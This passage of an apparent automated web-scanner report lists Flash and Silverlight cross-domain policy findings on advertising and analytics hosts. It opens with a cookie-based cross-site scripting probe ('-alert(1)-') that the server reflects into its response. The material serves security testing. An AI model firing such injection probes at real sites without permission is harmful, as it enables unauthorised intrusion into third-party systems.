Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD13887a'-alert(1)-'d025171d98; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2644
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:17 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv; domain=.contextweb.com; expires=Wed, 09-May-2012 14:00:18 GMT; path=/
Set-Cookie: 536156_4_101378=1304949618038; domain=.contextweb.com; path=/
Set-Cookie: cr=2|1|-8588966416881931568|1%0a15|1|-8588960524674394528|1; domain=.contextweb.com; expires=Thu, 03-May-2012 14:00:18 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Tue, 10-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script src="http://tag.admeld.com/passback/js/610/gannett/728x90/8/meld.js"></scr'+'ipt>\n'
;
document.write(strCreative);var strCreative=''
+ '<iframe src="http://bh.context
...[SNIP]...
<IFRAME SRC="http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.NEWSCURRENTAFFAIRS,536156,541,1697,1443,,LIFL1,FCRT1,ZETC1,AMQU2,NETM7,EXPD13887a'-alert(1)-'d025171d98,728X90" HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO">
...[SNIP]...

4. Flash cross-domain policy
There are 23 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad-apac.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-apac.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-apac.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Mon, 09 May 2011 14:01:16 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://ad.au.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.au.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Thu, 23 Oct 2008 00:22:36 GMT
Date: Mon, 09 May 2011 14:02:49 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.3. http://adserver.adtech.de/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserver.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

4.4. http://adserverams.adtech.de/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserverams.adtech.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserverams.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

4.5. http://alvenda.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://alvenda.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: alvenda.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:52 GMT
Server: Omniture DC/2.0.0
xserver: www268
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.6. http://api.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Last-Modified: Thu, 10 Mar 2011 15:50:46 EST
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 118
Date: Mon, 09 May 2011 14:04:27 GMT
Connection: keep-alive
Server:

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

4.7. http://cspix.media6degrees.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 09 May 2011 14:05:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.8. http://f2nthevine.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://f2nthevine.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: f2nthevine.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:58 GMT
Server: Omniture DC/2.0.0
xserver: www22
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.9. http://ie-stat.bmmetrix.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ie-stat.bmmetrix.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ie-stat.bmmetrix.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:51 GMT
Server: Apache/2
Last-Modified: Mon, 19 May 2008 17:46:09 GMT
ETag: "1dea8-c4-44d98f0503a40"
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.10. http://imp.fetchback.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

4.11. http://in.getclicky.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.getclicky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: in.getclicky.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:17 GMT
Server: Apache
Last-Modified: Thu, 28 Jun 2007 14:35:20 GMT
ETag: "cb802f-c9-433f845a21a00"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.12. http://ipcmedia.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ipcmedia.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ipcmedia.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:02 GMT
Server: Omniture DC/2.0.0
xserver: www13
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.13. http://irishtimesgroup.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://irishtimesgroup.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: irishtimesgroup.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:12 GMT
Server: Omniture DC/2.0.0
xserver: www141
Content-Length: 93
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

4.14. http://p.addthis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://p.addthis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.addthis.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:06:01 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

4.15. http://pixel.33across.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"211-1298012359000"
Last-Modified: Fri, 18 Feb 2011 06:59:19 GMT
Content-Type: application/xml
Content-Length: 211
Date: Mon, 09 May 2011 14:05:37 GMT
Connection: close
Server: 33XG1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

4.16. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 09 May 2011 02:46:13 GMT
Expires: Tue, 10 May 2011 02:46:13 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 40491

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.17. http://secure-au.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-au.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-au.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:49 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 16 May 2011 14:06:49 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

4.18. http://va.px.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:06:29 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

4.19. http://edge.viagogo.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://edge.viagogo.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.viagogo.co.uk

Response

HTTP/1.0 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Date: Mon, 09 May 2011 14:01:15 GMT
Expires: Tue, 10 May 2011 14:01:15 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: .VGGANON=qOnF8gMwzgEkAAAAMGY0MjJiMTAtZWEzOC00MTVkLWE5MWMtMjM3NWZmM2M0OGMx0; domain=viagogo.co.uk; expires=Wed, 03-Apr-2013 00:41:15 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=8e482fb9-b603-4f0f-8ec3-c8fd97b01e43; domain=viagogo.co.uk; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 1016
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.viagogo.net" />
<allow-access-from domain="*.viagogo.co.uk" />
<allow-access-from domain="*.viagogo.com" />
<allow-access-from domain="*.viagogo.at" />
<allow-access-from domain="*.viagogo.be" />
<allow-access-from domain="*.viagogo.ch" />
<allow-access-from domain="*.viagogo.de" />
<allow-access-from domain="*.viagogo.dk" />
<allow-access-from domain="*.viagogo.es" />
<allow-access-from domain="*.viagogo.fr" />
<allow-access-from domain="*.viagogo.ie" />
<allow-access-from domain="*.viagogo.it" />
<allow-access-from domain="*.viagogo.lu" />
<allow-access-from domain="*.viagogo.lv" />
<allow-access-from domain="*.viagogo.nl" />
<allow-access-from domain="*.viagogo.ru" />
<allow-access-from domain="*.viagogo.se" />
<allow-access-from domain="*.viagogo.pt" />
<allow-access-from domain="*.viagogo.pl" />
<allow-access-from domain="*.viagogo.co.za" />
...[SNIP]...

4.20. http://l.alvenda.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://l.alvenda.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.alvenda.net

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 489
Last-Modified: Tue, 22 Mar 2011 15:28:56 GMT
Server: Jetty(6.1.22)

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mast
...[SNIP]...
<allow-access-from domain="*.alvenda.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.alvenda.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akamai.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="false"/>
...[SNIP]...

4.21. http://optimized-by.rubiconproject.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:25 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

4.22. http://static.nme.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.nme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.nme.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 05 May 2011 12:04:21 GMT
ETag: "15b82fe-3fa-4a2862c655b40"
Accept-Ranges: bytes
Content-Length: 1018
Content-Type: text/xml
Cache-Control: max-age=2592000
Expires: Wed, 08 Jun 2011 14:02:17 GMT
Date: Mon, 09 May 2011 14:02:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="nme.com" />
   <allow-access-from domain="www.nme.com" secure="false" />
...[SNIP]...
<allow-access-from domain="web.nme.com" />
   <allow-access-from domain="*.nme.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ipcignite.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ipcdigital.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.userplane.com" />
   <allow-access-from domain="*.panthercustomer.com" />
   <allow-access-from domain="*.adtech.de" />
   <allow-access-from domain="*.umee.tv" />
   <allow-access-from domain="*.clearspring.com" />
   <allow-access-from domain="*.brightcove.com" />
   <allow-access-from domain="*.google-analytics.com" />
   <allow-access-from domain="*.ipcmediasecure.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nuts.co.uk" />
<allow-access-from domain="*.mousebreaker.com" />
...[SNIP]...

4.23. http://west.thomson.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: west.thomson.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=259200
Content-Length: 283
Content-Type: text/xml
Last-Modified: Mon, 15 Nov 2010 19:47:55 GMT
Accept-Ranges: bytes
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 14:06:53 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="west.thomson.com" />

...[SNIP]...
<allow-access-from domain="thelink.thomsonreuters.com" />
...[SNIP]...

5. Silverlight cross-domain policy
There are 9 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad-apac.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-apac.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-apac.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Mon, 09 May 2011 14:01:16 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://ad.au.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.au.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 21:50:56 GMT
Date: Mon, 09 May 2011 14:02:49 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.3. http://alvenda.122.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://alvenda.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: alvenda.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:52 GMT
Server: Omniture DC/2.0.0
xserver: www56
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.4. http://f2nthevine.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://f2nthevine.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: f2nthevine.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:58 GMT
Server: Omniture DC/2.0.0
xserver: www156
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.5. http://ipcmedia.122.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ipcmedia.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

